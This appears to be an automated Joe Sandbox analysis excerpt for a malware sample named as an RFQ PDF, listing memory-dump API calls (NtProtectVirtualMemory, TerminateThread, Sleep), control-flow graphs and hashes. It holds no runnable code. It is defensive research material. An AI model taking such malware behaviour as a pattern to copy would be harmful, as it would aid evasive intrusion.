                              Uniqueness Score: -1.00%

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FFA0
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 4ff5dbe5da8c7a32038f5f3402e253a3dca2ec7999d36f262bd3363c5626e8d6
                              • Instruction ID: ef3b00e3aa37d14c3109ef53ab46f680713ebe12c6b7f370b9f289717e101169
                              • Opcode Fuzzy Hash: 4ff5dbe5da8c7a32038f5f3402e253a3dca2ec7999d36f262bd3363c5626e8d6
                              • Instruction Fuzzy Hash: A2E086B58493818FE3946E32C10E39ABBB1FF047E1B519458989287076D36D8C85CF01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FFA0
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 14 56f961-56fa4d TerminateThread 19 56fa53-56fa6e 14->19 20 56fbdc-56fbf6 14->20 19->20 22 56fa74-56fa78 19->22 22->20 23 56fa7e-56fa82 22->23 23->20 24 56fa88-56fa8c 23->24 24->20 26 56fa92-56fa96 24->26 26->20 27 56fa9c-56faa0 26->27 27->20 28 56faa6-56faaf 27->28 28->20 29 56fab5-56fafb 28->29 31 56fafc-56fb08 29->31 32 56fb0a-56fb0e 31->32 33 56fb4b-56fbd8 31->33 32->20 35 56fb14-56fb15 32->35 35->31
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: TerminateThread
                              • String ID:
                              • API String ID: 1852365436-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 39 56f96d-56f96e 40 56f971-56f987 39->40 40->40 41 56f989-56fa4d TerminateThread 40->41 46 56fa53-56fa6e 41->46 47 56fbdc-56fbf6 41->47 46->47 49 56fa74-56fa78 46->49 49->47 50 56fa7e-56fa82 49->50 50->47 51 56fa88-56fa8c 50->51 51->47 53 56fa92-56fa96 51->53 53->47 54 56fa9c-56faa0 53->54 54->47 55 56faa6-56faaf 54->55 55->47 56 56fab5-56fafb 55->56 58 56fafc-56fb08 56->58 59 56fb0a-56fb0e 58->59 60 56fb4b-56fbd8 58->60 59->47 62 56fb14-56fb15 59->62 62->58
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: TerminateThread
                              • String ID:
                              • API String ID: 1852365436-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 83 56f9e2-56f9e3 84 56f966-56fa04 TerminateThread 83->84 85 56f9e5-56fa04 TerminateThread 83->85 86 56fa36-56fa4d 84->86 85->86 90 56fa53-56fa6e 86->90 91 56fbdc-56fbf6 86->91 90->91 93 56fa74-56fa78 90->93 93->91 94 56fa7e-56fa82 93->94 94->91 95 56fa88-56fa8c 94->95 95->91 97 56fa92-56fa96 95->97 97->91 98 56fa9c-56faa0 97->98 98->91 99 56faa6-56faaf 98->99 99->91 100 56fab5-56fafb 99->100 102 56fafc-56fb08 100->102 103 56fb0a-56fb0e 102->103 104 56fb4b-56fbd8 102->104 103->91 106 56fb14-56fb15 103->106 106->102
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: TerminateThread
                              • String ID:
                              • API String ID: 1852365436-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions